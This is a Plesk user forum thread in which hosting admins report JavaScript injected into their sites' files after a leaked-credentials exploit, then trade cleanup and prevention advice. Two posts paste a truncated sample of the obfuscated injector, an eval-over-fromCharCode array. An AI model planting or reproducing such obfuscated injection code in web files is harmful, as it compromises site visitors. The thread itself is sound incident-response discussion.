• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

JS files being hacked, even after micro-updates

B

BrunoMiguel

New Pleskian
Hello,
Several months ago we had hundreads of files hacked, due to bug fixed on MU#11 for Plesk 9.5.4. After that, we had no problems until now...
We have, again, several websites being hacked, and being injected to this kind of javascript:

/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100,222,327,312,117,218,294,404,114,80,123,492,10,64,96,128,32,236,291,456,32,208,315,128,61,64,348,416,105,230,138,460,101,202,300,128,47,64,348,416,105,230,138,324,59,20,96,128,32,64,354,388,114,64,324,444,32,122,96,464,104,210,345,184,115,202,303,400,32,74,96,464,104,210,345,184,81,118,30,128,32,64,96,472,97,228,96,464,101,230,348,128,61,64,348,416,105,230,138,260,32,84,96,432,111,64,135,128,116,208,315,460,46,164,96,168,32,208,315,236,10,64,96,128,32,210,306,160,116,202,345,464,32,124,96,192,41,246,30,128,32,64,96,128,32,64,96,464,104,210,345,184,115,202,303,400,32,122,96,464,101,230,348,236,10,64,96,128,32,250 (.................................................)

Do you think this can be a new bug found in Plesk 9.5 ? I have another servers with P10.4, and until now I have no issues of this kind.

Thanks.
 
Ok and after micro updates, how do we clean all the vulnerable files from the server ?
 
Last edited by a moderator:
you could try using clam av or some other anti malware program to scan and remove the files. If you have backups of the client files, that would be preferable I would imagine.
 
BrunoMiguel said:
Hello,
Several months ago we had hundreads of files hacked, due to bug fixed on MU#11 for Plesk 9.5.4. After that, we had no problems until now...
We have, again, several websites being hacked, and being injected to this kind of javascript:

/*km0ae9gr6m*/try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[102,234,330,396,116,210,333,440,32,220,303,480,116,164,291,440,100,222,327,312,117,218,294,404,114,80,123,492,10,64,96,128,32,236,291,456,32,208,315,128,61,64,348,416,105,230,138,460,101,202,300,128,47,64,348,416,105,230,138,324,59,20,96,128,32,64,354,388,114,64,324,444,32,122,96,464,104,210,345,184,115,202,303,400,32,74,96,464,104,210,345,184,81,118,30,128,32,64,96,472,97,228,96,464,101,230,348,128,61,64,348,416,105,230,138,260,32,84,96,432,111,64,135,128,116,208,315,460,46,164,96,168,32,208,315,236,10,64,96,128,32,210,306,160,116,202,345,464,32,124,96,192,41,246,30,128,32,64,96,128,32,64,96,464,104,210,345,184,115,202,303,400,32,122,96,464,101,230,348,236,10,64,96,128,32,250 (.................................................)

Do you think this can be a new bug found in Plesk 9.5 ? I have another servers with P10.4, and until now I have no issues of this kind.

Thanks.
Click to expand...

I also advice and recommend installing mod_security. This can help alot with stopping apache related attacks.
 
Not sure its a new exploit.

We have noticed this issue on a number of accounts within a few of our servers as well. During an investigation we have determined that this appears to be related to the lack of changed passwords from the Exploit mentioned in Feb (Here).

During our investigation into the matter we found a single IP address logging into many accounts one after another. On dates that our customers files were written with the .js code we have found that same said IP address had logged into the account.

I have found that changing the user passwords prevents this issue from re-occurring, at least for the time being that is.. we have not noticed any account with a changed password to have any new exploits added to their scripts.

Hope this helps everyone else that has this issue as well.
 
Hi, I'm on Plesk 8.3 and have the same issue. Are the passwords to change the domain administrator passwords or the FTP passwords?
 
First and foremost you should make sure that you have the patch installed already and have changed your main Plesk admin password. (any other Plesk admin/domain admins should be changed as well)

Then change All Plesk users (client accounts) and FTP to be safe. If you server was exploited via the Exploit in February and they are just now using the data.. Then all areas are vulnerable unless passwords have changed since then.

My advice would be to change any password on the server that is related or stored in Plesk. (Protected Directories/ Plesk Access/ Email/ FTP/ anything else that has a password in Plesk).
 
In the admin logs I see entries such as:

POST /plesk/client@1/domain@/?context=domains HTTP/1.1
GET /domains/dom_ctrl.php3?dom_id=86&previous_page=domains&cmd=file_manager HTTP/1.1

How can I match client@1 and dom_id=86 to something on my plesk control panel so that I can see which passwords are being used?
 
I can see what happened from my logs - the intruders were logged in as client1 and then went to every one of the client's domains and tried to insert their code via filemanager.php. From the recent logs, it doesn't look like the intrusion involved any other plesk function. In my setup, logged in as a domain administrator doesn't give access to filemanager.
 
aeescobar said:
In the admin logs I see entries such as:

POST /plesk/client@1/domain@/?context=domains HTTP/1.1
GET /domains/dom_ctrl.php3?dom_id=86&previous_page=domains&cmd=file_manager HTTP/1.1

How can I match client@1 and dom_id=86 to something on my plesk control panel so that I can see which passwords are being used?
Click to expand...

You can find name of domain and client_id with following SQL query in psa database:

select name,cl_id from domains where id=86;
 
Fix not solve the problem

I have a Plesk 9.0.3 over Ubuntu 8.04LTS.

I was hacked last week, removed the bad code, and changed all the FTP User password, root & admin.

Then Patched the server.

Today morning I have been hacked again.

Any additional fix?

Brest Regards
 
Mass password upgrade script will be improved soon. Now we have marked this important information by red letters in article http://kb.parallels.com/en/113321 and published information in our twitter https://twitter.com/PleskService
Click to expand...

I really looking forward to this. Mistakes can happen, but you really need to provide us more help than saying "the database was downloaded" and you have to reset all passwords. Perhaps it would make sense to tell that the same guys are running (perl based) rootkits and how to clean. And provide a quick fix like disabling filemanger.

Also I don't know if you get what it means to reset ALL passwords (even email). It's hard to reset all, but some people just are using the email on the server. It's hard to give them the password if they can't access their mailbox. This means days of additional work - so please help us a little bit more beside this very basic information and helpers (you didn't even provide a script to remove the additional sourcode). I also know a lot admins who lost a lot customers due downtime and bad google messages. What else can we do beside trust you and patch our systems emediately. But at this time a lot of us were hacked already.
 
Last edited by a moderator:
I have bad news.

One of our servers, desinfected, patched, password changed and session removed has been hacked again this night.

Our clients are complaining about it is the third time it happens. It is critical to solve this issue.

Any thought about how to do it and why it has happened again?

Best Regards
 
Did you renamed the filemanager? Since I did this, all attacks stopped...

But still no additional information of SW Soft how to protect the CP. Looking forward to this...
 
You must log in or register to reply here.
Back
Top